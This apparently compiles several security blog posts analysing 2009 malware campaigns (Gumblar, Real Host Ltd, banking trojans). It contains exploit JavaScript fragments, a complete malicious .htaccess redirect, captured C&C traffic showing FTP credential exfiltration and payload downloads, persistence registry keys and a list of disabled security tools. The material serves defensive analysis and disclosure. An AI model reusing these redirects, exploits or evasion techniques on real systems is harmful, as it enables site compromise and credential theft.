To get to the root of the problem, Afilias (the company responsible for .info domains) and GoDaddy (the registrar) were involved to investigate. They quickly blocked the offending domains once it was clear they were hostile. What was very surprising was the end result, GoDaddy removed 711 domains that were affiliated with this attack!

Attack scripts:

hxxp://us.hn0.info/f/1/ie.html

http://www.virustotal.com/analisis/a53300db52ccf8a236348995c0480aed05fa4419d1eb5c471808a6ae2fd0d9b6-1259947372

hxxp://us.hn0.info/f/1/ff.html

http://www.virustotal.com/analisis/1d3778247739c072cb435e3b11a0592503cb71f6a03cce24af85ca20ba110f00-1259947360

hxxp://us.hn0.info/f/1/cosplay.swf
http://wepawet.iseclab.org/view.php?hash=8e2a2167a9f34c1c0b9d7ac456aff807&type=swf

Shellcode:
http://www.virustotal.com/analisis/71d15b19cc00d4ddb8cd9152f071671abe398fb6da7b0517b1d6a0e0c3e61995-1259948262

The domains:

The attackers use the same techniques to exploit victims but this time have moved to new domains and updated their payloads. There are 2 payloads dropped on compromised hosts at the end of the attacks that steal banking credentials and send SPAM. These payloads are delivered by multiple exploits including  an unpatched 0day vulnerability and a previously unpatched one.

Directshow – MS09-028 (previously a 0day, patched recently)

function directshow()
{
var shellcode=unescape(“%uC033….

obj.data=’./directshow.php’;
obj.classid=’clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF’;

Microsoft Office Web Components (unpatched 0day)

function spreadsheet()
{
try
{
var objspread=new ActiveXObject(‘OWC10.Spreadsheet’);
}

After conducting further research on 71speed.info and finding it hosted by Real Host Ltd of Latvia it quickly became apparent how bad this host is. A quick search leads to a blog written by Dynamoo where the activities of this host are first uncovered. Delving deeper into this provider  it is apparent that they are a major hub of cybercrime activity which we will discuss further. This post has been prepared in conjunction with Jart Armin from HostExploit.com. Jart will present a higher level view of Real Host’s activities in relation to other entities and most interestingly how they related to the former Russian Business Network (RBN).

It should be noted that many of these sites are no longer reachable due to swift efforts by registrar Directi.

Observed Hostile Activity:

• Exploits including unpatched (or soon to be patched) 0days
• Payloads to drop on victim PCs including: fake codecs, banking trojans, spambots, fake anti virus, downloaders and even a Mac trojan
• Phishing sites
• Moneymule recruitment sites
• Botnet Command and Control servers
• Hosting of cybercrime websites – Iframe programs
• Distributing licensed software (Warez)

Real Host has 3 /28 IP blocks (48 IPs) that they get from Junik (AS8206), these are:

inetnum: 213.182.197.0 – 213.182.197.15
netname: Real_Host_NET3
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.224 – 213.182.197.239
netname: Real_Host_NET1
descr: Real Host
country: LV
abuse-mailbox: abuseemaildhcp@gmail.com

inetnum: 213.182.197.240 – 213.182.197.255
netname: Real_Host_NET2
descr: Real Host
country: LV
abuse-mailbox: abusemailhost@gmail.com

The first indication of suspicious activity is the use of gmail addresses as abuse contacts.

Next, here is data from my security tools showing attacks and the dates associated with them:

A little manual investigation led me to the following:

The domain I found most amusing was botnet.su, the attackers clearly aren’t trying to hide their motives on this one! This domain was previously used by the RBN along with NewskyAG and others. More on this link can be found at hostexploit.com.

Zeus seems to be one of the most common threats being hosted from Real Host’s network. According to recent information released by Damballa, Zeus is the #1 botnet in the US with an estimated 3.6 million PCs compromised.

To begin, let’s look at the money mule sites the Barwells Group and NewskyAG, here is an excerpt from the link included above:

BarwellsGroup

“During the trial period (1 month), you will be paid 2000 USD per month
while working on average 3 hours per day, Monday-Friday, plus 5
commission from every transactions or task received and processed. The
salary will be sent in the form of wire transfer directly to your
account. After the trial period your base pay salary will go up to
3,500USD per month, plus 5 commission.”

Clearly this is a money mule recruitment program. Sounds pretty good for 3 hours work per day, maybe I should quit my day job!

NewskyAG

Not only does this domain operate a money mule scam, it also ran a Zeus C&C server. What is scary is that people actually fall prey to this scheme as shown by this quote from yahoo answers:

Q: “Anyone ever heard of a company called NewSky Ag?”

A: “Yes I work for them from home and so far everything is ok but I’ve only been doing it about 2 months so if you have any more ? please let me know”

Next we have a phish for a Russian social networking site

Lastly lets look at iframepartners.com, the site is currently down however information is still available. The site pays malicious web admins to put iframes on their compromised websites. A colleague of mine was kind enough to translate the text from Russian (thanks Alex!). It reads:

1. A partner pays for iframe traffic, we accept only us, gb, it, au, and it will be in average from $1 to $20 for 1K depending on traffic quality

2. We accept only ads that generate more that 50K USA traffic

3. You are prohibited to install anything else with our iframe

4. Adult traffic is not welcomed

5. An account will be deleted without payout in case of detection of spam or worm traffic

6. We have been deleting accounts that are not active for few days

7. Cheaters and hit-boters, please don’t waste our time, look for other places

8. Payout twice a month, in the beginning and in the middle of month
Use XXX XXXXXX to contact us

Notice how adult sites, worms and spam traffic is not allowed? This is probably due to the fact that they are very noisy and easily spotted by security professionals.

This leads to another site called installing.cc. This site pays for installing malware onto compromised PCs.

Another interesting hit comes up from a design company called web-alfa.com. They designed an eye catching flash banner advertisement for the attackers.

The slides in the flash movie say:

Long-live substitution,

And software sale,

Referral system,

And other life enjoyments

For invitation and detailed information contact us via XXX XXXXXX

Clearly Real Host Ltd is hosting major cybercrime activity as a vast number of IPs in their space host malicious content. Several of the domains hosted with them were used by the former RBN. Real Host represents a major threat to individuals, business and the safety of the Internet ecosystem.

www.youtube.com/watch?v=DNx9iMcRAQg

To give you some additional insight into the attack, I am also able to share the contents of a hacked server’s .htaccess file. The miscreants upload this file to automatically redirect visitors to a site under their control.

These lines will redirect all requests for 400,401,403,404 and 500 pages to ake.kz, the attacker controlled site.

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

The following entries check to see if a user has been referred to the compromised website by a search engine. If they have, they will be automatically forwarded on to the attacker’s site, ake.kz

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

Lets take a look at what happens to the victim webserver after it gets compromised and the malware involved. To make this post more interesting I’ve decided to deliver my analysis via video! Rather than the standard nerve grating rock music that people tend to add to videos like this I have opted for my genre of choice, electronic . I’ve included virus total results, domains involved, etc at the end of the post.

Sit back, relax and enjoy the ride.

www.youtube.com/watch?v=9HdA1lC2PWM

Domains / URLs involved:

71speed.info
xbx.tw/in.cgi?6
xbx.tw/in.cgi?3
zyejanag.cn/rf/
fvuligir.cn/s/in.cgi?11
84.244.138.58/ts/in.cgi?chtr&5f9d90
esli.tw/load.php?e=1
esli.tw/2/index.php
esli.tw/show.php?s=18f8bc6e98

Exploits Used:

MDAC -- MS06-014
Adobe Acroat -- CVE-2008-2992 & CVE-2009-0927
Adobe Flash Player (not sure which one)
Microsoft DirectShow & Office Web Components zero days
Microsoft Snapshot Viewer MS08-041

Virustotal Payload 1 & ThreatExpert Payload 1 -- SilentBanker -- Banking Trojan

Virustotal Payload 2 & ThreatExpert Payload 2 -- Tedroo -- SpamBot

Wepawet PDF exploit

In the last few weeks (beginning June 17th), a particular OCH (one click host) hotlinkfiles.com began serving up malware. The host uses AV according to a March 25th, 2008 post on their website:

“Today we introduce a new feature of virus scanning on all uploaded files. This is part of our service to protect you from downloading any virus. The feature is seamlessly integrated into Hotlinkfiles.com, our anti-virus software will automatically perform a scan on all uploaded files and will reject any infected file.”

The malware being served must be going undetected by whatever AV hotlinkfiles.com is using. Here is what is being served:

Notice the use of premium.hotlinkfiles.com? This means the attacker has either bought an account or has used a account stolen from an unsuspecting victim.

Detection for the first stage download is pretty good at 30/41, most vendors detect it as Banload which is also classed as a banking trojan. [Virustotal1] [Virustotal2]

Downloader.Banload.AMIX
Win-Trojan/Banload.71680.O
Win32/TrojanDownloader.Banload.BDA

PWS-Banker!ee
Mal_Banker

The file downloads several more payloads which are all executables [Threatexpert] however the detection rate is terrible on them with most being detected by 0/41 vendors. [Virustotal]

hxxp://gay24x01.hpg.ig.com.br/ree1.html
hxxp://gay24x01.hpg.ig.com.br/ree2.html
hxxp://gay24x02.hpg.ig.com.br/nl2.html
hxxp://gay24x02.hpg.ig.com.br/nl3.html
hxxp://gay24x02.hpg.ig.com.br/nl4.html
hxxp://gay24x02.hpg.ig.com.br/nl5.html
hxxp://gay24x02.hpg.ig.com.br/nl6.html
hxxp://gay24x02.hpg.ig.com.br/nl7.html

So what does this mean? Since sites like hotlinkfiles.com are perfectly legitimate, web content filtering will not block them. The second stage URL can still be blocked, however it can change and analysis must be performed before the second stage URL can be found. In a corporate environment, you may want to consider blocking these file transfer services if they are not needed.

As for where this attack came from, it was delivered via SPAM with a subject line of “fotos [date]” and is written in Portuguese. The text reads “These photos are very funny”.

Summary

This attack appears to be brought to us courtesy of the attackers behind Gumblar. The malware involved and the end result are very similar. The objective of the attack is to:

Install a socks proxy
Install fake AV (System Security)
Steal FTP credentials
Send SPAM
Redirect search queries

What’s new? The attackers use updated and more stealthy code. They also introduce a component which fiddles with Terminal Services (RDP) although I’m not 100% sure why yet.

Details

Information on Websense’s site was sparse, but a quick google search for the first part of the domain they referenced in their alert yeilded the information I needed. The initial attack was coming from rnw.kz/index.php. This domain is on 91.212.65.133 which is hosted by Eurohost out of the Ukraine which I have run across many times before. I’ll probably post another article on these guys shortly.

inetnum: 91.212.65.0 - 91.212.65.255
netname: EUROHOST-NET
descr: Eurohost LLC
descr: Provider Local Registry
country: UA

This IP hosts many other domains associated with the attack:

sovi.tw
rmi.tw
orep.tw
molo.tw
dmr.tw

When connecting to rnw.kz, a series of redirects take place between the above noted domains. Cookies are created (probably so a victim is only infected once) to track victims and are passed onto the next domain. If the user has already visited the site, they are sent on to ask.com. The mighty wepawet was not sucessful in analysing the attack as it pointed me to ask.com

After using MalZilla to quickly decode the exploit code (discussed in WebSense’s Alert), the final payload was evident and resides at: http://orep.tw/pve/pics.php?id=[unique id] [VirusTotal] [Threat Expert].

A VM of mine was infected and after loading internet explorer the malware lit up and did it’s thing. I’ve submitted a few files to VT but to be honest I haven’t had to much time to investigate to cover everything.

Virustotal 1

Virustotal 2

Binary Downloads, Ads and C&C communication

Interesting notes:

User Agent: socks
HTTP server: nginx (commonly used by attackers)
C&C appears to be: trafficshop.tw
Version: 3.15.3
Some of the attacker’s SQL is visable: UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&sft=AAAAAAAAA&rvz1=41&rvz2=0002786062 HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:25:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 1822
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
#U;:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U7:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U?:<br>|ADVERTISING|——————————————–|<a href=”http://www.best-med-shop.com”>   ||Buy Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa,   <br>|from The Best Online Pharmacy! FDA Approved. Low pricing, discounts,                    <br>|flawless customer support. New discounts and special offers !       <br>|</a>|http://www.best-med-shop.com|——————————————–%%
#U=:FORUM ADVERTISING|——————————————–||[URL=http://www.best-med-shop.com]  ||Canadian medicine and pharmacy is most professional. Generic pills. High qulity and lowest price.||Viagra, Cialis, Levitra, Propecia, Champix, Tamiflu, Xenical, Reductil, Intrinsa…. [/url]|||http://www.best-med-shop.com||——————————————–%%

GET /zub/zc.php?l=US&d=0A91D4B2BEDE419DAD002CB5AF39B158&v=3.15.3&k=200704_socks.exe,432128_sever.exe,11264_ic.exe HTTP/1.1

Host: trafficshop.tw
HTTP/1.1 200 OK
Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 251
Content-Type: text/html

#U1:http://orep.tw/socks.exe
#U1:http://orep.tw/sever.exe
#U1:http://orep.tw/ic.exe
Array
(
[0] => 200704_socks.exe
[1] => 432128_sever.exe
[2] => 11264_ic.exe
)
UPDATE `downfiles` SET `Dcnt` = `Dcnt` + 1 WHERE `Did`=2;
.crc tmpl.

GET /n1.exe HTTP/1.1
User-Agent: Mozilla
Host: miosmschat.com

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Tue, 16 Jun 2009 23:34:57 GMT
Content-Type: application/octet-stream
Connection: close
Content-Length: 512830
Last-Modified: Tue, 16 Jun 2009 23:30:01 GMT
Accept-Ranges: bytes

Other interesting network traffic

GET /in.php?url=5&affid=02800 HTTP/1.1
Referrer: http://greatmarketingservices.com/
Accept: *//*
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows XP)
Host: greatmarketingservices.com
Connection: Keep-Alive
Cache-Control: no-cache

POST /socks/gate/r.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 125
Cache-Control: no-cache

s=0002804890612064add4936a533bbafe4f66456af0d214d0d8b7025665dbbcb84b1ff54d03fecq0d16129l0t1q1d2817l0t1q3d11521l0t1q9d7937l0t1HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 29
Content-Type: text/html

iogeelhchqhogmhgggdccnghdqdk

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 78
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…ya.ru/5/982HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html

POST /socks/gate/data.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: socks
Host: trafficshop.tw
Content-Length: 93
Cache-Control: no-cache

CEF30D45FF1B48BCBBD5665207B8D0D412D0FA65466F4EFABB335A6394DDA460…AAAAAAAACI.050010026000300HTTP/1.1 200 OK

Date: Wed, 17 Jun 2009 00:26:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 50
Content-Type: text/html

Files & Reg Keys

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\sever.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\18888124: “C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe”
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\98898116: “C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe”
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Appiytt_Dlls: “nvbms”
HKLM\SOFTWARE\Classes\CLSID\{425882B0-B0BF-11CE-B59F-00AA006CB37D}\InProcServer32\: “C:\WINDOWS\system32\npp\ndisnpp.dll”

C:\Documents and Settings\All Users\Application Data\18888124\18888124.exe (fake av)
C:\Documents and Settings\All Users\Application Data\18888124\18888124.glu (fake av)
C:\Documents and Settings\All Users\Application Data\98898116\98898116.exe (fake av)
C:\Documents and Settings\All Users\Application Data\98898116.ini (fake av)
C:\Documents and Settings\user\Local Settings\Temp\izohore.bmp (fake av)
C:\Documents and Settings\user\Local Settings\Temp\TMP46.tmpC:\WINDOWS\system32\4311z.sc
C:\WINDOWS\system32\cxilanls
C:\WINDOWS\system32\nh4g.bbv
C:\WINDOWS\system32\nvbms.dll
C:\WINDOWS\system32\sfxzmtforum.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmt.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtsmtspm.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sfxzmtwbmail.dll (best-med-shop.com advertising)
C:\WINDOWS\system32\sgr3.ge
C:\WINDOWS\system32\SOCKET2.DLL
C:\WINDOWS\system32\SOCKET2w.DLL
C:\WINDOWS\system32\SPORDER.DLL
C:\WINDOWS\system32\user32.DLL
C:\WINDOWS\system32\vrur
C:\WINDOWS\sever.exe
C:\WINDOWS\socks.exe (socks proxy)

Other notable behavior

The malware tries to overwrite user32.dll, triggering windows file protection. My VM bluescreened a couple times during analysis which means victims are probably suffering the same problem. The malware also installs winpcap and hides it’s presence by deleting various reg keys and the winpcap uninstaller.

Summary

Once compromised by the Gumblar / Martuz / Geno attack, victims will have many pieces of malware loaded onto their machines, this malware does the following:

Steals FTP credentials
Sends SPAM
Installs fake anti virus
Highjacks Google search queries
Disables security software

The exploits used are for Adobe Acrobat and Adobe Flash Player.

Some further reading:

unmaskparasites
dynamoo

FTP credential stealing

While observing the bot in my lab the first thing that indicated the ability to steal credentials was the bot trying to put my network card into promiscuous mode. I then logged into ftp.mozilla.org as anonymous and sure enough my credentials were ex filtrated in an encoded format.

POST /good/receiver/ftp HTTP/1.1
Host: 78.109.29.114
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

ftp_uri_0=9ObqyMjmQWwGxvOwcOfhoJ%2BClWBtBM2kvnD%2F0qzByfsUN0eauuUxo6GiyNX4&ftp_source_0=xuD7lIGgQw

Doing a little recon, we can see the attacker is using “Capture Manager v1.0″, a purchase which seems to be really paying off for them

Capture Manager

As mentioned earlier, the malware downloads software to sniff network traffic, winpcap. With the network card in promiscuous mode, the attacker can then capture other FTP credentials from machines on the same subnet.

An entry is made in the registry for winpcap: HKLM\SOFTWARE\WinPcap

SPAM

The first time I infected myself with the malware, a SPAM bot was installed that had communication that looked like Pushdo. However the second time I infected myself the malware exhibited different behavior and did not send the same traffic. My firewall still recorded drops on port 25, so the malware authors must be deploying a different SPAM engine now. I have not had a chance to investigate this portion of the attack any further.

Fake Antivirus

As with so many attacks as of late, fake anti virus is also installed on the affected machines. In this case it is “System Security 2009″, screenshots below.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SystemSecurity2009

Search Hijacking

The next portion of the attack involves hijacking google search results. The malware installs a proxy on port 7171 which then redirects searches. When a user searches for something, the malware will send the user to a page of it’s choosing filled with bogus search results. Here is an example of what you get after clicking a google search result for “car”.

Sys32dll.exe contains the proxy which has a firewall bypass rule added as well. Also note that a rule is added for port 80.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer: “http=localhost:7171″
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\80:TCP: “80:TCP:*:Enabled:SYS32DLL”
HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7171:TCP: “7171:TCP:*:Enabled:SYS32DLL”

Disable Security Software

In order to keep itself running and make life more difficult for both analysts and users, the malware disables many security and administrative tools by sending them to the windows system debugger. Here is an example:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonealarm.exe\Debugger: “ntsd -d”

And here is a list of all the blocked applications:

a2service.exe
ArcaCheck.exe
arcavir.exe
ashDisp.exe
ashEnhcd.exe
ashServ.exe
ashUpd.exe
aswUpdSv.exe
autoruns.exe
avadmin.exe
avcenter.exe
avcls.exe
avconfig.exe
avconsol.exe
avgnt.exe
avgrssvc.exe
avguard.exe
AvMonitor.exe
avp.com
avp.exe
AVP32.EXE
avscan.exe
avz.exe
avz4.exe
avz_se.exe
bdagent.exe
bdinit.exe
caav.exe
caavguiscan.exe
casecuritycenter.exe
CCenter.exe
ccupdate.exe
cfp.exe
cfpupdat.exe
cmdagent.exe
drwadins.exe
DRWEB32.EXE
drwebupw.exe
ekrn.exe
FAMEH32.EXE
filemon.exe
FPAVServer.exe
fpscan.exe
FPWin.exe
fsav32.exe
fsgk32st.exe
FSMA32.EXE
GFRing3.exe
guardgui.exe
guardxservice.exe
guardxup.exe
HijackThis.exe
KASMain.exe
KASTask.exe
KAV32.exe
KAVDX.exe
KAVPF.exe
KAVPFW.exe
KAVStart.exe
KPFW32.exe
KPFW32X.exe
Navapsvc.exe
Navapw32.exe
navigator.exe
NAVNT.EXE
NAVSTUB.EXE
NAVW32.EXE
NAVWNT.EXE
niu.exe
nod32.exe
nod32krn.exe
Nvcc.exe
OllyDBG.EXE
outpost.exe
preupd.exe
procexp.exe
pskdr.exe
regedit.exe
regmon.exe
RegTool.exe
scan32.exe
SfFnUp.exe
Vba32arkit.exe
vba32ldr.exe
vsserv.exe
Zanda.exe
zapro.exe
Zlh.exe
zonealarm.exe
zoneband.dll

Domains

Since both gumblar.cn and martuz.cn are down as of this writing, I will discuss the secondary domains involved in the attack. These are the domains that actually host the malware and exploits and listen on port 8080 so they may seem offline if you try connecting directly.

autobestwestern.cn
bestlotron.cn
betbigwager.cn
denverfilmdigitalmedia.cn
educationbigtop.cn
filmtypemedia.cn
finditbig.cn
greatbethere.cn
hotslotpot.cn
liteautotop.cn
litebest.cn
litegreatestdirect.cn
litetopdetect.cn
lotbetsite.cn
lotwageronline.cn
mediahomenamemartvideo.cn
nameashop.cn
perfectnamestore.cn
playbetwager.cn
bestfindaloan.cn
finditbig.cn
litetopdetect.cn
litetopfindworld.cn
lotwageronline.cn
nanotopdiscover.cn
torrentoreactor.net
bestfindaloan.cn
finditbig.cn
litegreatestdirect.cn
lotwageronline.cn

These are additional domains involved in the attack:

nua20090515.com – C&C
i-site.ph – binary download
zz-dns.com – additional C&C?
main15052009.com – fake av related?
besthandycap.com
ya.ru
…and many more…

Other Information

Malware startup

1) HKLM\SYSTEM\ControlSet001\Services\VSSMSDTC\ImagePath: “C:\WINDOWS\system32\asferrort.exe srv”
2) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromoReg: “C:\WINDOWS\Temp\wpv701242765100.exe”
3) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pp: “c:\windows\pp10.exe” (I also saw pp08.exe, so this name is variable)
4) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\12281714: “C:\Documents and Settings\All Users\Application Data\12281714\12281714.exe”
5) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\92291706: “C:\Documents and Settings\All Users\Application Data\92291706\92291706.exe”
6) HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sysldtray: “c:\windows\ld08.exe”

An additional security provider is also installed in the form of digiwet.dll, I have not investigated this piece of the attack.

HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SecurityProviders: “msapsspc.dll, schannel.dll, digest.dll, msnsspc.dll, digiwet.dll”

A BHO (browser helper object) is also installed here:

HKLM\SOFTWARE\Classes\CLSID\{31F57AFD-3989-4A5B-A33E-6B6253DF8DD4}\InprocServer32\: “C:\WINDOWS\system32\547372\547372.dll”

One of the pieces of malware (ld08.exe) also hooks several APIs:

C&C communication

The magic number field below may be a key to encode the further communication to hamper analysis.

GET /new/controller.php?action=bot&entity_list=&uid=1&first=1&guid=953988293&rnd=981633 HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:49 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 581632
Entity-Info: 1241292389:50176:2;1241530597:32768:1;1241643870:41984:1;1242216620:28672:2;1242765100:428032:2;

Rnd: 982147
Magic-Number: 1024|1|121:12:234:245:236:103:151:67:93:53:56:150:6:94:36:63:106:66:140:194:113:23:183:92:85:78:68:182:185:205:58:51:217:36:40:198:140:191:10:234:245:66:128:252:160:164:59:10:230:200:205:88:223:132:181:53:210:249:235:140:198:38:191:160:74:231:102:215:167:113:193:156:180:65:152:85:230:211:95:205:155:45:37:123:178:218:176:132:211:156:16:154:194:208:58:13:183:161:228:95:19:166:251:199:232:148:28:206:104:124:155:4:170:193:127:92:155:48:224:111:204:241:10:143:194:69:156:121:231:129:217:250:39:212:194:15:105:223:222:209:92:122:214:6:59:85:98:215:134:67:71:83:53:82:226:247:151:126:113:127:0:74:122:39:31:60:55:136:28:22:90:120:144:48:126:204:134:225:164:12:36:236:95:89:62:65:81:214:192:194:85:193:13:207:232:44:12:32:181:40:54:15:161:199:64:31:148:198:0:57:211:37:38:51:127:100:117:208:59:53:147:144:247:160:96:223:204:108:0:130:149:55:145:54:255:210:86:148:153:87:205:108:124:243:159:252:88:20:204:148:74:96:36:65:0:133:33:205:242:34:79:136:89:225:190:89:179:20:237:77:108:187:185:232:175:89:228:7:110:177:155:185:17:192:251:18:70:29:223:56:63:47:192:153:16:127:243:196:148:224:17:0:155:203:233:74:37:205:82:148:127:238:78:145:174:73:163:244:103:131:45:166:178:238:64:195:110:51:135:2:20:153:2:175:101:235:250:138:185:76:30:57:58:108:202:233:182:110:222:29:241:12:196:164:251:5:103:105:57:239:107:77:136:110:253:237:90:247:120:20:68:150:77:127:3:24:105:186:135:71:216:121:84:156:29:79:162:132:184:219:116:36:40:252:146:37:233:236:29:98:0:97:249:78:225:252:102:74:183:237:146:143:102:231:44:132:54:206:9:239:169:125:19:209:121:166:247:99:146:20:197:147:118:190:225:88:187:72:162:115:54:53:2:157:28:47:33:83:253:42:66:167:167:86:121:33:252:112:133:143:133:75:34:252:9:4:84:197:77:247:56:131:44:59:32:73:106:66:156:104:108:222:15:20:52:136:53:49:249:186:192:126:5:227:122:15:232:207:213:53:198:13:185:242:73:218:59:179:28:216:28:136:182:43:156:235:179:210:28:172:141:220:43:146:192:166:162:168:117:119:222:59:133:151:46:206:113:106:130:142:66:159:23:249:202:180:228:126:134:1:43:19:222:86:166:158:253:73:71:114:193:37:174:70:188:220:21:46:70:152:188:137:55:211:130:2:136:103:128:14:104:171:34:71:2:201:229:255:18:44:114:211:81:32:26:14:253:47:60:67:200:249:205:255:205:79:1:85:182:130:100:31:45:135:102:48:80:76:48:99:121:162:55:203:194:81:217:191:129:22:3:73:16:208:73:222:32:75:51:215:205:152:247:251:31:94:44:112:170:92:211:36:254:10:239:193:91:201:129:221:224:132:38:241:85:112:207:118:188:3:77:137:155:69:133:187:163:178:43:78:14:254:114:13:8:98:206:100:43:79:65:12:212:104:253:42:217:204:160:149:207:238:31:107:51:165:38:214:87:81:36:101:79:151:115:88:249:65:189:37:145:255:49:102:104:46:144:65:250:49:214:202:31:246:53:83:155:91:42:242:172:79:88:252:230:203:85:223:13:19:5:159:18:54:5:123:100:150:189:95:199:147:42:231:138:95:58:37:187:101:24:104:180:112:101:155:60:186:123:74:206:128:233:225:182:239:92:27:133:25:123:77:173:165:52:55:5:111:93:192:213:117:40:137:230:141:37:35:72:160:109:22:33:87:247:216:70:84:243:204:110:111:25:27:20:78:83:25:190:176:218:147:38:2:28:13:144:66:48:217:227:158:239:4:245:231:221:60:60:208:9:170:64:35:198:84:113:25:110:47:202:73:194:240:76:223:254:220:34:46:181:5:205:165:10:195:141:231:0:201:184:9:116:248:44:58:77:158:83:188:206:30:5:145:15:81:113:13:46:147:60:228:153:9:137:163:205:23:138:205:225:67:214:85:59:3:143:136:161:227:69:112:2:74:1:17:156:114:30:202:5:91:174:159:100:56:66:50:79:205:255:49:16:213:134:75:217:22:212:123:250:26:235:252:100:236:14:1:95:44:203:100:135:122:4:236:179:70:30:3:19:30:52:36:243:187:112:205:209:69:72:204:95:51:201:196:32:215:197:127:3:145:228:139:11:232:120:191:46:151:194:66:181:246:103:169:177:215:119:131:28:191:80:123:242:25:63:18:240:4:145:244:149:118:
GET /new/controller.php?action=report&guid=0&rnd=981633&uid=1&entity=1241292389:unique_start;1241530597:unique_start;1241643870:unique_start;1242216620:unique_start;1242765100:unique_start HTTP/1.1

Host: 78.109.29.112
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 20 May 2009 19:58:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close

X-Powered-By: PHP/5.1.6
Content-Length: 0

This next portion is the bot receiving it’s commands on what files to download next

POST /ld/gen.php HTTP/1.1
